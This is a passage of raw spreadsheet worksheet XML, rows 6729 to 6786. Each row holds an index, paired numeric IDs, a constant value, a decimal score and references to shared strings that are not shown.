      </c>
      <c r="G6729" t="s">
        <v>13309</v>
      </c>
      <c r="H6729" t="s">
        <v>13310</v>
      </c>
    </row>
    <row r="6730" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6730" s="1">
        <v>6728</v>
      </c>
      <c r="B6730">
        <v>4453</v>
      </c>
      <c r="C6730">
        <v>4453</v>
      </c>
      <c r="D6730">
        <v>3</v>
      </c>
      <c r="E6730">
        <v>0.63330000638961792</v>
      </c>
      <c r="F6730" t="s">
        <v>10120</v>
      </c>
      <c r="G6730" t="s">
        <v>13311</v>
      </c>
      <c r="H6730" t="s">
        <v>13312</v>
      </c>
    </row>
    <row r="6731" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6731" s="1">
        <v>6729</v>
      </c>
      <c r="B6731">
        <v>4449</v>
      </c>
      <c r="C6731">
        <v>4449</v>
      </c>
      <c r="D6731">
        <v>3</v>
      </c>
      <c r="E6731">
        <v>0.74779999256134033</v>
      </c>
      <c r="F6731" t="s">
        <v>10120</v>
      </c>
      <c r="G6731" t="s">
        <v>13313</v>
      </c>
      <c r="H6731" t="s">
        <v>13314</v>
      </c>
    </row>
    <row r="6732" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6732" s="1">
        <v>6730</v>
      </c>
      <c r="B6732">
        <v>4448</v>
      </c>
      <c r="C6732">
        <v>4448</v>
      </c>
      <c r="D6732">
        <v>3</v>
      </c>
      <c r="E6732">
        <v>0.80570000410079956</v>
      </c>
      <c r="F6732" t="s">
        <v>10120</v>
      </c>
      <c r="G6732" t="s">
        <v>13315</v>
      </c>
      <c r="H6732" t="s">
        <v>13316</v>
      </c>
    </row>
    <row r="6733" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6733" s="1">
        <v>6731</v>
      </c>
      <c r="B6733">
        <v>4440</v>
      </c>
      <c r="C6733">
        <v>4440</v>
      </c>
      <c r="D6733">
        <v>3</v>
      </c>
      <c r="E6733">
        <v>0.65399998426437378</v>
      </c>
      <c r="F6733" t="s">
        <v>10120</v>
      </c>
      <c r="G6733" t="s">
        <v>13317</v>
      </c>
      <c r="H6733" t="s">
        <v>13318</v>
      </c>
    </row>
    <row r="6734" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6734" s="1">
        <v>6732</v>
      </c>
      <c r="B6734">
        <v>457</v>
      </c>
      <c r="C6734">
        <v>457</v>
      </c>
      <c r="D6734">
        <v>3</v>
      </c>
      <c r="E6734">
        <v>0.93220001459121704</v>
      </c>
      <c r="F6734" t="s">
        <v>10120</v>
      </c>
      <c r="G6734" t="s">
        <v>13319</v>
      </c>
      <c r="H6734" t="s">
        <v>13320</v>
      </c>
    </row>
    <row r="6735" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6735" s="1">
        <v>6733</v>
      </c>
      <c r="B6735">
        <v>49</v>
      </c>
      <c r="C6735">
        <v>49</v>
      </c>
      <c r="D6735">
        <v>3</v>
      </c>
      <c r="E6735">
        <v>0.85180002450942993</v>
      </c>
      <c r="F6735" t="s">
        <v>10120</v>
      </c>
      <c r="G6735" t="s">
        <v>13321</v>
      </c>
      <c r="H6735" t="s">
        <v>13322</v>
      </c>
    </row>
    <row r="6736" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6736" s="1">
        <v>6734</v>
      </c>
      <c r="B6736">
        <v>463</v>
      </c>
      <c r="C6736">
        <v>463</v>
      </c>
      <c r="D6736">
        <v>3</v>
      </c>
      <c r="E6736">
        <v>0.49660000205039978</v>
      </c>
      <c r="F6736" t="s">
        <v>10120</v>
      </c>
      <c r="G6736" t="s">
        <v>13323</v>
      </c>
      <c r="H6736" t="s">
        <v>13324</v>
      </c>
    </row>
    <row r="6737" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6737" s="1">
        <v>6735</v>
      </c>
      <c r="B6737">
        <v>4435</v>
      </c>
      <c r="C6737">
        <v>4435</v>
      </c>
      <c r="D6737">
        <v>3</v>
      </c>
      <c r="E6737">
        <v>0.99930000305175781</v>
      </c>
      <c r="F6737" t="s">
        <v>10120</v>
      </c>
      <c r="G6737" t="s">
        <v>13325</v>
      </c>
      <c r="H6737" t="s">
        <v>13326</v>
      </c>
    </row>
    <row r="6738" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6738" s="1">
        <v>6736</v>
      </c>
      <c r="B6738">
        <v>679</v>
      </c>
      <c r="C6738">
        <v>679</v>
      </c>
      <c r="D6738">
        <v>3</v>
      </c>
      <c r="E6738">
        <v>0.81550002098083496</v>
      </c>
      <c r="F6738" t="s">
        <v>10120</v>
      </c>
      <c r="G6738" t="s">
        <v>13327</v>
      </c>
      <c r="H6738" t="s">
        <v>13328</v>
      </c>
    </row>
    <row r="6739" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6739" s="1">
        <v>6737</v>
      </c>
      <c r="B6739">
        <v>47</v>
      </c>
      <c r="C6739">
        <v>47</v>
      </c>
      <c r="D6739">
        <v>3</v>
      </c>
      <c r="E6739">
        <v>0.63499999046325684</v>
      </c>
      <c r="F6739" t="s">
        <v>10120</v>
      </c>
      <c r="G6739" t="s">
        <v>13329</v>
      </c>
      <c r="H6739" t="s">
        <v>13330</v>
      </c>
    </row>
    <row r="6740" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6740" s="1">
        <v>6738</v>
      </c>
      <c r="B6740">
        <v>5415</v>
      </c>
      <c r="C6740">
        <v>5415</v>
      </c>
      <c r="D6740">
        <v>3</v>
      </c>
      <c r="E6740">
        <v>0.78140002489089966</v>
      </c>
      <c r="F6740" t="s">
        <v>10120</v>
      </c>
      <c r="G6740" t="s">
        <v>13331</v>
      </c>
      <c r="H6740" t="s">
        <v>13332</v>
      </c>
    </row>
    <row r="6741" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6741" s="1">
        <v>6739</v>
      </c>
      <c r="B6741">
        <v>471</v>
      </c>
      <c r="C6741">
        <v>471</v>
      </c>
      <c r="D6741">
        <v>3</v>
      </c>
      <c r="E6741">
        <v>0.60269999504089355</v>
      </c>
      <c r="F6741" t="s">
        <v>10120</v>
      </c>
      <c r="G6741" t="s">
        <v>13333</v>
      </c>
      <c r="H6741" t="s">
        <v>13334</v>
      </c>
    </row>
    <row r="6742" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6742" s="1">
        <v>6740</v>
      </c>
      <c r="B6742">
        <v>5418</v>
      </c>
      <c r="C6742">
        <v>5418</v>
      </c>
      <c r="D6742">
        <v>3</v>
      </c>
      <c r="E6742">
        <v>0.45489999651908869</v>
      </c>
      <c r="F6742" t="s">
        <v>10120</v>
      </c>
      <c r="G6742" t="s">
        <v>13335</v>
      </c>
      <c r="H6742" t="s">
        <v>13336</v>
      </c>
    </row>
    <row r="6743" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6743" s="1">
        <v>6741</v>
      </c>
      <c r="B6743">
        <v>4430</v>
      </c>
      <c r="C6743">
        <v>4430</v>
      </c>
      <c r="D6743">
        <v>3</v>
      </c>
      <c r="E6743">
        <v>0.98170000314712524</v>
      </c>
      <c r="F6743" t="s">
        <v>10120</v>
      </c>
      <c r="G6743" t="s">
        <v>13337</v>
      </c>
      <c r="H6743" t="s">
        <v>13338</v>
      </c>
    </row>
    <row r="6744" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6744" s="1">
        <v>6742</v>
      </c>
      <c r="B6744">
        <v>46</v>
      </c>
      <c r="C6744">
        <v>46</v>
      </c>
      <c r="D6744">
        <v>3</v>
      </c>
      <c r="E6744">
        <v>0.93980002403259277</v>
      </c>
      <c r="F6744" t="s">
        <v>10120</v>
      </c>
      <c r="G6744" t="s">
        <v>13339</v>
      </c>
      <c r="H6744" t="s">
        <v>13340</v>
      </c>
    </row>
    <row r="6745" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6745" s="1">
        <v>6743</v>
      </c>
      <c r="B6745">
        <v>5420</v>
      </c>
      <c r="C6745">
        <v>5420</v>
      </c>
      <c r="D6745">
        <v>3</v>
      </c>
      <c r="E6745">
        <v>0.51999998092651367</v>
      </c>
      <c r="F6745" t="s">
        <v>10120</v>
      </c>
      <c r="G6745" t="s">
        <v>13341</v>
      </c>
      <c r="H6745" t="s">
        <v>13342</v>
      </c>
    </row>
    <row r="6746" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6746" s="1">
        <v>6744</v>
      </c>
      <c r="B6746">
        <v>3975</v>
      </c>
      <c r="C6746">
        <v>3975</v>
      </c>
      <c r="D6746">
        <v>3</v>
      </c>
      <c r="E6746">
        <v>0.99570000171661377</v>
      </c>
      <c r="F6746" t="s">
        <v>10120</v>
      </c>
      <c r="G6746" t="s">
        <v>13343</v>
      </c>
      <c r="H6746" t="s">
        <v>13344</v>
      </c>
    </row>
    <row r="6747" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6747" s="1">
        <v>6745</v>
      </c>
      <c r="B6747">
        <v>4428</v>
      </c>
      <c r="C6747">
        <v>4428</v>
      </c>
      <c r="D6747">
        <v>3</v>
      </c>
      <c r="E6747">
        <v>0.72000002861022949</v>
      </c>
      <c r="F6747" t="s">
        <v>10120</v>
      </c>
      <c r="G6747" t="s">
        <v>13345</v>
      </c>
      <c r="H6747" t="s">
        <v>13346</v>
      </c>
    </row>
    <row r="6748" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6748" s="1">
        <v>6746</v>
      </c>
      <c r="B6748">
        <v>3983</v>
      </c>
      <c r="C6748">
        <v>3983</v>
      </c>
      <c r="D6748">
        <v>3</v>
      </c>
      <c r="E6748">
        <v>0.97990000247955322</v>
      </c>
      <c r="F6748" t="s">
        <v>10120</v>
      </c>
      <c r="G6748" t="s">
        <v>13347</v>
      </c>
      <c r="H6748" t="s">
        <v>13348</v>
      </c>
    </row>
    <row r="6749" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6749" s="1">
        <v>6747</v>
      </c>
      <c r="B6749">
        <v>4373</v>
      </c>
      <c r="C6749">
        <v>4373</v>
      </c>
      <c r="D6749">
        <v>3</v>
      </c>
      <c r="E6749">
        <v>0.65659999847412109</v>
      </c>
      <c r="F6749" t="s">
        <v>10120</v>
      </c>
      <c r="G6749" t="s">
        <v>13349</v>
      </c>
      <c r="H6749" t="s">
        <v>13350</v>
      </c>
    </row>
    <row r="6750" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6750" s="1">
        <v>6748</v>
      </c>
      <c r="B6750">
        <v>41</v>
      </c>
      <c r="C6750">
        <v>41</v>
      </c>
      <c r="D6750">
        <v>3</v>
      </c>
      <c r="E6750">
        <v>0.99690002202987671</v>
      </c>
      <c r="F6750" t="s">
        <v>10120</v>
      </c>
      <c r="G6750" t="s">
        <v>13351</v>
      </c>
      <c r="H6750" t="s">
        <v>13352</v>
      </c>
    </row>
    <row r="6751" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6751" s="1">
        <v>6749</v>
      </c>
      <c r="B6751">
        <v>1</v>
      </c>
      <c r="C6751">
        <v>1</v>
      </c>
      <c r="D6751">
        <v>3</v>
      </c>
      <c r="E6751">
        <v>0.83660000562667847</v>
      </c>
      <c r="F6751" t="s">
        <v>10120</v>
      </c>
      <c r="G6751" t="s">
        <v>13353</v>
      </c>
      <c r="H6751" t="s">
        <v>13354</v>
      </c>
    </row>
    <row r="6752" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6752" s="1">
        <v>6750</v>
      </c>
      <c r="B6752">
        <v>4372</v>
      </c>
      <c r="C6752">
        <v>4372</v>
      </c>
      <c r="D6752">
        <v>3</v>
      </c>
      <c r="E6752">
        <v>0.58880001306533813</v>
      </c>
      <c r="F6752" t="s">
        <v>10120</v>
      </c>
      <c r="G6752" t="s">
        <v>13355</v>
      </c>
      <c r="H6752" t="s">
        <v>13356</v>
      </c>
    </row>
    <row r="6753" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6753" s="1">
        <v>6751</v>
      </c>
      <c r="B6753">
        <v>34</v>
      </c>
      <c r="C6753">
        <v>34</v>
      </c>
      <c r="D6753">
        <v>3</v>
      </c>
      <c r="E6753">
        <v>0.81330001354217529</v>
      </c>
      <c r="F6753" t="s">
        <v>10120</v>
      </c>
      <c r="G6753" t="s">
        <v>13357</v>
      </c>
      <c r="H6753" t="s">
        <v>13358</v>
      </c>
    </row>
    <row r="6754" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6754" s="1">
        <v>6752</v>
      </c>
      <c r="B6754">
        <v>657</v>
      </c>
      <c r="C6754">
        <v>657</v>
      </c>
      <c r="D6754">
        <v>3</v>
      </c>
      <c r="E6754">
        <v>0.84839999675750732</v>
      </c>
      <c r="F6754" t="s">
        <v>10120</v>
      </c>
      <c r="G6754" t="s">
        <v>13359</v>
      </c>
      <c r="H6754" t="s">
        <v>13360</v>
      </c>
    </row>
    <row r="6755" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6755" s="1">
        <v>6753</v>
      </c>
      <c r="B6755">
        <v>4344</v>
      </c>
      <c r="C6755">
        <v>4344</v>
      </c>
      <c r="D6755">
        <v>3</v>
      </c>
      <c r="E6755">
        <v>0.50069999694824219</v>
      </c>
      <c r="F6755" t="s">
        <v>10120</v>
      </c>
      <c r="G6755" t="s">
        <v>13361</v>
      </c>
      <c r="H6755" t="s">
        <v>13362</v>
      </c>
    </row>
    <row r="6756" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6756" s="1">
        <v>6754</v>
      </c>
      <c r="B6756">
        <v>4343</v>
      </c>
      <c r="C6756">
        <v>4343</v>
      </c>
      <c r="D6756">
        <v>3</v>
      </c>
      <c r="E6756">
        <v>0.69160002470016479</v>
      </c>
      <c r="F6756" t="s">
        <v>10120</v>
      </c>
      <c r="G6756" t="s">
        <v>13363</v>
      </c>
      <c r="H6756" t="s">
        <v>13364</v>
      </c>
    </row>
    <row r="6757" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6757" s="1">
        <v>6755</v>
      </c>
      <c r="B6757">
        <v>656</v>
      </c>
      <c r="C6757">
        <v>656</v>
      </c>
      <c r="D6757">
        <v>3</v>
      </c>
      <c r="E6757">
        <v>0.60269999504089355</v>
      </c>
      <c r="F6757" t="s">
        <v>10120</v>
      </c>
      <c r="G6757" t="s">
        <v>13365</v>
      </c>
      <c r="H6757" t="s">
        <v>13366</v>
      </c>
    </row>
    <row r="6758" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6758" s="1">
        <v>6756</v>
      </c>
      <c r="B6758">
        <v>4340</v>
      </c>
      <c r="C6758">
        <v>4340</v>
      </c>
      <c r="D6758">
        <v>3</v>
      </c>
      <c r="E6758">
        <v>0.50069999694824219</v>
      </c>
      <c r="F6758" t="s">
        <v>10120</v>
      </c>
      <c r="G6758" t="s">
        <v>13367</v>
      </c>
      <c r="H6758" t="s">
        <v>13362</v>
      </c>
    </row>
    <row r="6759" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6759" s="1">
        <v>6757</v>
      </c>
      <c r="B6759">
        <v>4054</v>
      </c>
      <c r="C6759">
        <v>4054</v>
      </c>
      <c r="D6759">
        <v>3</v>
      </c>
      <c r="E6759">
        <v>0.97350001335144043</v>
      </c>
      <c r="F6759" t="s">
        <v>10120</v>
      </c>
      <c r="G6759" t="s">
        <v>13368</v>
      </c>
      <c r="H6759" t="s">
        <v>13369</v>
      </c>
    </row>
    <row r="6760" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6760" s="1">
        <v>6758</v>
      </c>
      <c r="B6760">
        <v>496</v>
      </c>
      <c r="C6760">
        <v>496</v>
      </c>
      <c r="D6760">
        <v>3</v>
      </c>
      <c r="E6760">
        <v>0.5374000072479248</v>
      </c>
      <c r="F6760" t="s">
        <v>10120</v>
      </c>
      <c r="G6760" t="s">
        <v>13370</v>
      </c>
      <c r="H6760" t="s">
        <v>13371</v>
      </c>
    </row>
    <row r="6761" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6761" s="1">
        <v>6759</v>
      </c>
      <c r="B6761">
        <v>4334</v>
      </c>
      <c r="C6761">
        <v>4334</v>
      </c>
      <c r="D6761">
        <v>3</v>
      </c>
      <c r="E6761">
        <v>0.99119997024536133</v>
      </c>
      <c r="F6761" t="s">
        <v>10120</v>
      </c>
      <c r="G6761" t="s">
        <v>13372</v>
      </c>
      <c r="H6761" t="s">
        <v>13373</v>
      </c>
    </row>
    <row r="6762" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6762" s="1">
        <v>6760</v>
      </c>
      <c r="B6762">
        <v>4332</v>
      </c>
      <c r="C6762">
        <v>4332</v>
      </c>
      <c r="D6762">
        <v>3</v>
      </c>
      <c r="E6762">
        <v>0.59039998054504395</v>
      </c>
      <c r="F6762" t="s">
        <v>10120</v>
      </c>
      <c r="G6762" t="s">
        <v>13374</v>
      </c>
      <c r="H6762" t="s">
        <v>13375</v>
      </c>
    </row>
    <row r="6763" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6763" s="1">
        <v>6761</v>
      </c>
      <c r="B6763">
        <v>4327</v>
      </c>
      <c r="C6763">
        <v>4327</v>
      </c>
      <c r="D6763">
        <v>3</v>
      </c>
      <c r="E6763">
        <v>0.52619999647140503</v>
      </c>
      <c r="F6763" t="s">
        <v>10120</v>
      </c>
      <c r="G6763" t="s">
        <v>13376</v>
      </c>
      <c r="H6763" t="s">
        <v>13377</v>
      </c>
    </row>
    <row r="6764" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6764" s="1">
        <v>6762</v>
      </c>
      <c r="B6764">
        <v>4326</v>
      </c>
      <c r="C6764">
        <v>4326</v>
      </c>
      <c r="D6764">
        <v>3</v>
      </c>
      <c r="E6764">
        <v>0.44999998807907099</v>
      </c>
      <c r="F6764" t="s">
        <v>10120</v>
      </c>
      <c r="G6764" t="s">
        <v>13378</v>
      </c>
      <c r="H6764" t="s">
        <v>13379</v>
      </c>
    </row>
    <row r="6765" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6765" s="1">
        <v>6763</v>
      </c>
      <c r="B6765">
        <v>498</v>
      </c>
      <c r="C6765">
        <v>498</v>
      </c>
      <c r="D6765">
        <v>3</v>
      </c>
      <c r="E6765">
        <v>0.53680002689361572</v>
      </c>
      <c r="F6765" t="s">
        <v>10120</v>
      </c>
      <c r="G6765" t="s">
        <v>13380</v>
      </c>
      <c r="H6765" t="s">
        <v>13381</v>
      </c>
    </row>
    <row r="6766" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6766" s="1">
        <v>6764</v>
      </c>
      <c r="B6766">
        <v>4345</v>
      </c>
      <c r="C6766">
        <v>4345</v>
      </c>
      <c r="D6766">
        <v>3</v>
      </c>
      <c r="E6766">
        <v>0.78200000524520874</v>
      </c>
      <c r="F6766" t="s">
        <v>10120</v>
      </c>
      <c r="G6766" t="s">
        <v>13382</v>
      </c>
      <c r="H6766" t="s">
        <v>13383</v>
      </c>
    </row>
    <row r="6767" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6767" s="1">
        <v>6765</v>
      </c>
      <c r="B6767">
        <v>504</v>
      </c>
      <c r="C6767">
        <v>504</v>
      </c>
      <c r="D6767">
        <v>3</v>
      </c>
      <c r="E6767">
        <v>0.58259999752044678</v>
      </c>
      <c r="F6767" t="s">
        <v>10120</v>
      </c>
      <c r="G6767" t="s">
        <v>13384</v>
      </c>
      <c r="H6767" t="s">
        <v>13385</v>
      </c>
    </row>
    <row r="6768" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6768" s="1">
        <v>6766</v>
      </c>
      <c r="B6768">
        <v>4321</v>
      </c>
      <c r="C6768">
        <v>4321</v>
      </c>
      <c r="D6768">
        <v>3</v>
      </c>
      <c r="E6768">
        <v>0.8278999924659729</v>
      </c>
      <c r="F6768" t="s">
        <v>10120</v>
      </c>
      <c r="G6768" t="s">
        <v>13386</v>
      </c>
      <c r="H6768" t="s">
        <v>13387</v>
      </c>
    </row>
    <row r="6769" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6769" s="1">
        <v>6767</v>
      </c>
      <c r="B6769">
        <v>4318</v>
      </c>
      <c r="C6769">
        <v>4318</v>
      </c>
      <c r="D6769">
        <v>3</v>
      </c>
      <c r="E6769">
        <v>0.83509999513626099</v>
      </c>
      <c r="F6769" t="s">
        <v>10120</v>
      </c>
      <c r="G6769" t="s">
        <v>13388</v>
      </c>
      <c r="H6769" t="s">
        <v>13389</v>
      </c>
    </row>
    <row r="6770" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6770" s="1">
        <v>6768</v>
      </c>
      <c r="B6770">
        <v>2</v>
      </c>
      <c r="C6770">
        <v>2</v>
      </c>
      <c r="D6770">
        <v>3</v>
      </c>
      <c r="E6770">
        <v>0.73589998483657837</v>
      </c>
      <c r="F6770" t="s">
        <v>10120</v>
      </c>
      <c r="G6770" t="s">
        <v>13390</v>
      </c>
      <c r="H6770" t="s">
        <v>13391</v>
      </c>
    </row>
    <row r="6771" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6771" s="1">
        <v>6769</v>
      </c>
      <c r="B6771">
        <v>4055</v>
      </c>
      <c r="C6771">
        <v>4055</v>
      </c>
      <c r="D6771">
        <v>3</v>
      </c>
      <c r="E6771">
        <v>0.99889999628067017</v>
      </c>
      <c r="F6771" t="s">
        <v>10120</v>
      </c>
      <c r="G6771" t="s">
        <v>13392</v>
      </c>
      <c r="H6771" t="s">
        <v>13393</v>
      </c>
    </row>
    <row r="6772" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6772" s="1">
        <v>6770</v>
      </c>
      <c r="B6772">
        <v>4316</v>
      </c>
      <c r="C6772">
        <v>4316</v>
      </c>
      <c r="D6772">
        <v>3</v>
      </c>
      <c r="E6772">
        <v>0.73360002040863037</v>
      </c>
      <c r="F6772" t="s">
        <v>10120</v>
      </c>
      <c r="G6772" t="s">
        <v>13394</v>
      </c>
      <c r="H6772" t="s">
        <v>13395</v>
      </c>
    </row>
    <row r="6773" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6773" s="1">
        <v>6771</v>
      </c>
      <c r="B6773">
        <v>511</v>
      </c>
      <c r="C6773">
        <v>511</v>
      </c>
      <c r="D6773">
        <v>3</v>
      </c>
      <c r="E6773">
        <v>0.63510000705718994</v>
      </c>
      <c r="F6773" t="s">
        <v>10120</v>
      </c>
      <c r="G6773" t="s">
        <v>13396</v>
      </c>
      <c r="H6773" t="s">
        <v>13397</v>
      </c>
    </row>
    <row r="6774" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6774" s="1">
        <v>6772</v>
      </c>
      <c r="B6774">
        <v>512</v>
      </c>
      <c r="C6774">
        <v>512</v>
      </c>
      <c r="D6774">
        <v>3</v>
      </c>
      <c r="E6774">
        <v>0.58219999074935913</v>
      </c>
      <c r="F6774" t="s">
        <v>10120</v>
      </c>
      <c r="G6774" t="s">
        <v>13398</v>
      </c>
      <c r="H6774" t="s">
        <v>13399</v>
      </c>
    </row>
    <row r="6775" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6775" s="1">
        <v>6773</v>
      </c>
      <c r="B6775">
        <v>4056</v>
      </c>
      <c r="C6775">
        <v>4056</v>
      </c>
      <c r="D6775">
        <v>3</v>
      </c>
      <c r="E6775">
        <v>0.97450000047683716</v>
      </c>
      <c r="F6775" t="s">
        <v>10120</v>
      </c>
      <c r="G6775" t="s">
        <v>13400</v>
      </c>
      <c r="H6775" t="s">
        <v>13401</v>
      </c>
    </row>
    <row r="6776" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6776" s="1">
        <v>6774</v>
      </c>
      <c r="B6776">
        <v>5455</v>
      </c>
      <c r="C6776">
        <v>5455</v>
      </c>
      <c r="D6776">
        <v>3</v>
      </c>
      <c r="E6776">
        <v>0.54919999837875366</v>
      </c>
      <c r="F6776" t="s">
        <v>10120</v>
      </c>
      <c r="G6776" t="s">
        <v>13402</v>
      </c>
      <c r="H6776" t="s">
        <v>13403</v>
      </c>
    </row>
    <row r="6777" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6777" s="1">
        <v>6775</v>
      </c>
      <c r="B6777">
        <v>5456</v>
      </c>
      <c r="C6777">
        <v>5456</v>
      </c>
      <c r="D6777">
        <v>3</v>
      </c>
      <c r="E6777">
        <v>0.75739997625350952</v>
      </c>
      <c r="F6777" t="s">
        <v>10120</v>
      </c>
      <c r="G6777" t="s">
        <v>13404</v>
      </c>
      <c r="H6777" t="s">
        <v>13405</v>
      </c>
    </row>
    <row r="6778" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6778" s="1">
        <v>6776</v>
      </c>
      <c r="B6778">
        <v>5457</v>
      </c>
      <c r="C6778">
        <v>5457</v>
      </c>
      <c r="D6778">
        <v>3</v>
      </c>
      <c r="E6778">
        <v>0.98390001058578491</v>
      </c>
      <c r="F6778" t="s">
        <v>10120</v>
      </c>
      <c r="G6778" t="s">
        <v>13406</v>
      </c>
      <c r="H6778" t="s">
        <v>13407</v>
      </c>
    </row>
    <row r="6779" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6779" s="1">
        <v>6777</v>
      </c>
      <c r="B6779">
        <v>4059</v>
      </c>
      <c r="C6779">
        <v>4059</v>
      </c>
      <c r="D6779">
        <v>3</v>
      </c>
      <c r="E6779">
        <v>0.92619997262954712</v>
      </c>
      <c r="F6779" t="s">
        <v>10120</v>
      </c>
      <c r="G6779" t="s">
        <v>13408</v>
      </c>
      <c r="H6779" t="s">
        <v>13409</v>
      </c>
    </row>
    <row r="6780" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6780" s="1">
        <v>6778</v>
      </c>
      <c r="B6780">
        <v>5461</v>
      </c>
      <c r="C6780">
        <v>5461</v>
      </c>
      <c r="D6780">
        <v>3</v>
      </c>
      <c r="E6780">
        <v>0.62199997901916504</v>
      </c>
      <c r="F6780" t="s">
        <v>10120</v>
      </c>
      <c r="G6780" t="s">
        <v>13410</v>
      </c>
      <c r="H6780" t="s">
        <v>13411</v>
      </c>
    </row>
    <row r="6781" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6781" s="1">
        <v>6779</v>
      </c>
      <c r="B6781">
        <v>517</v>
      </c>
      <c r="C6781">
        <v>517</v>
      </c>
      <c r="D6781">
        <v>3</v>
      </c>
      <c r="E6781">
        <v>0.46740001440048218</v>
      </c>
      <c r="F6781" t="s">
        <v>10120</v>
      </c>
      <c r="G6781" t="s">
        <v>13412</v>
      </c>
      <c r="H6781" t="s">
        <v>13413</v>
      </c>
    </row>
    <row r="6782" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6782" s="1">
        <v>6780</v>
      </c>
      <c r="B6782">
        <v>508</v>
      </c>
      <c r="C6782">
        <v>508</v>
      </c>
      <c r="D6782">
        <v>3</v>
      </c>
      <c r="E6782">
        <v>0.57039999961853027</v>
      </c>
      <c r="F6782" t="s">
        <v>10120</v>
      </c>
      <c r="G6782" t="s">
        <v>13414</v>
      </c>
      <c r="H6782" t="s">
        <v>13415</v>
      </c>
    </row>
    <row r="6783" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6783" s="1">
        <v>6781</v>
      </c>
      <c r="B6783">
        <v>4346</v>
      </c>
      <c r="C6783">
        <v>4346</v>
      </c>
      <c r="D6783">
        <v>3</v>
      </c>
      <c r="E6783">
        <v>0.72659999132156372</v>
      </c>
      <c r="F6783" t="s">
        <v>10120</v>
      </c>
      <c r="G6783" t="s">
        <v>13416</v>
      </c>
      <c r="H6783" t="s">
        <v>13417</v>
      </c>
    </row>
    <row r="6784" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6784" s="1">
        <v>6782</v>
      </c>
      <c r="B6784">
        <v>4107</v>
      </c>
      <c r="C6784">
        <v>4107</v>
      </c>
      <c r="D6784">
        <v>3</v>
      </c>
      <c r="E6784">
        <v>0.71630001068115234</v>
      </c>
      <c r="F6784" t="s">
        <v>10120</v>
      </c>
      <c r="G6784" t="s">
        <v>13418</v>
      </c>
      <c r="H6784" t="s">
        <v>13419</v>
      </c>
    </row>
    <row r="6785" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6785" s="1">
        <v>6783</v>
      </c>
      <c r="B6785">
        <v>491</v>
      </c>
      <c r="C6785">
        <v>491</v>
      </c>
      <c r="D6785">
        <v>3</v>
      </c>
      <c r="E6785">
        <v>0.62449997663497925</v>
      </c>
      <c r="F6785" t="s">
        <v>10120</v>
      </c>
      <c r="G6785" t="s">
        <v>13420</v>
      </c>
      <c r="H6785" t="s">
        <v>13421</v>
      </c>
    </row>
    <row r="6786" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6786" s="1">
        <v>6784</v>
      </c>
      <c r="B6786">
        <v>4357</v>
      </c>
      <c r="C6786">
        <v>4357</v>
      </c>
      <c r="D6786">
        <v>3</v>
      </c>
      <c r="E6786">
        <v>0.65729999542236328</v>
      </c>
      <c r="F6786" t="s">
        <v>10120</v>
      </c>
      <c r="G6786" t="s">
        <v>13422</v>
      </c>
      <c r="H6786" t="s">
        <v>13423</v>
      </c>
    </row>
    <row r="6787" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6787" s="1">
        <v>6785</v>
      </c>
      <c r="B6787">
        <v>4356</v>
      </c>
      <c r="C6787">
        <v>4356</v>
      </c>
      <c r="D6787">
        <v>3</v>
      </c>
      <c r="E6787">
        <v>0.76759999990463257</v>
      </c>
      <c r="F6787" t="s">
        <v>10120</v>
      </c>
      <c r="G6787" t="s">
        <v>13424</v>
      </c>
      <c r="H6787" t="s">
        <v>13425</v>
      </c>
    </row>
    <row r="6788" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6788" s="1">
        <v>6786</v>
      </c>
